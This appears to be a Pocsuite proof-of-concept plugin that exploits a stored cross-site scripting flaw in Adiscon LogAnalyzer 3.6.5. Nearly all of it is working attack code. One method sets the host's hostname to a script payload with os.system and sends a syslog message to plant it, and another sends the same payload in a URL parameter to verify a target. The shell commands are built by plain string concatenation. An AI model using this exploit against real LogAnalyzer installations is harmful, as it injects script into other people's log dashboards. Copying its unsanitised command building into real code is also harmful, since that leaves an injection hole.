Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)

                                                #!/usr/bin/env python
# coding: utf-8
import os
import syslog
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '87249'  # ssvid
    version = '1.0'
    author = ['coc']
    vulDate = ''
    createDate = '2015-11-26'
    updateDate = '2015-11-26'
    references = ['http://www.sebug.net/vuldb/ssvid-87249']
    name = 'Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)'
    appPowerLink = 'http://loganalyzer.adiscon.com'
    appName = 'logAnalyzer'
    appVersion = '3.6.5'
    vulType = 'XSS'
    desc = '''
        Adiscon LogAnalyzer 3.6.5及之前版本的index.php和detail.php脚本中的主机名
        中存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意Web脚本或HTML。

        提示 attack 只是针对本机的 在exploit-db.com上的代码
        请后续大牛补充如何远程利用
    '''
    samples = ['']

    def _attack(self):
        result = {}
        hostname = os.uname()[1]
        payload="\"/><h1><script>alert(\"testtest\")</script><h1>"
        # print("+ Setting temporary hostname to " + payload + "...")
        os.system("hostname " +  payload)
        # print("+ Injecting the syslog message...")
        syslog.syslog("syslog xss injection")
        # print("+ Check LogAnalyzer dashboard...")
        raw_input("+ Press [enter] to restore hostname...")
        os.system("hostname " + "\""  +  hostname + "\"")
        # print("+ Hostname restored to " + hostname)
        result['VerifyInfo']={}
    
        return self.parse_output(result)

    def _verify(self):
        result = {}
        payload="\"/><h1><script>alert(\"testtest\")</script><h1>"
        vulurl='{url}/?filter={py}'.format(url=self.url,py=payload)
        resp=req.get(vulurl,headers=self.headers, timeout=50)
        if "<script>alert(\"testtest\")</script>" in resp.content:
            result['VerifyInfo']={}
            result['VerifyInfo']['URL']=vulurl

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)